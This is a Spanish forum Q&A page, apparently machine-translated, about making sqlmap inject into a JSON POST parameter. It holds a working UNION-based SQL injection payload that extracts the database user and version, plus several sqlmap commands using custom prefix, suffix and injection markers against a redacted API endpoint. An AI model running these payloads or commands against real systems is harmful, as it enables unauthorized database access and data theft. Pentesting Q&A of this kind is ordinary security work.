¿Cómo usar la inyección personalizada en sqlmap?

Question

¿Cómo usar la inyección personalizada en sqlmap?

#1 de Ben (1 votos)

0

Esto es información de publicación, normalmente se ve así

{"end_date":"2018-8-26","start_date":"2018-8-26","success":1}

Debajo del resultado "Tienes un error ..."

{"end_date":"2018-8-26'","start_date":"2018-8-26","success":1}

A continuación, imprima con éxito la versión de db y la versión de usuario

{"end_date":"00:00:00') union select 1,user(),version();--+","start_date":"","success":1}

Lo que he hecho hasta ahora es

python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00","start_date":"2018-8-26","success":1}' -p "end_date" --sql-query="00:00:00') union select 1,user(),version();--+" -v 3

Pero Sqlmap aún falló, ¿dónde estoy haciendo mal?

Gracias de antemano.

sql-injection sqlmap

pregunta Dark Cyber 27.08.2018 - 06:42

fuente

1 respuesta

Lea otras preguntas en las etiquetas sql-injection sqlmap

CA raíz o CA intermedia en el almacén de confianza del firewall ¿Hay alguna forma de enviar una contraseña a través de JSONP (GET) a través de HTTPS (SSL)? ¿Crypto quizás?

score 1 · Accepted Answer

Puedes probar algunos de los siguientes:

python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00*","start_date":"2018-8-26","success":1}' --sql-query="') union select 1,user(),version();--+" -v 3

Al usar el astersisco, puedes indicar a sqlmap dónde se debe inyectar.

python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00","start_date":"2018-8-26","success":1}' -p "end_date" --prefix="')" --suffix=";--+" -v 3

Puede usar el prefijo y el sufijo (así como combinarlos con el asterisco) para indicar con precisión a sqlmap dónde colocar qué intento de inyección. Tal vez eso resuelva tu problema ya. También puede echar un vistazo de cerca aquí .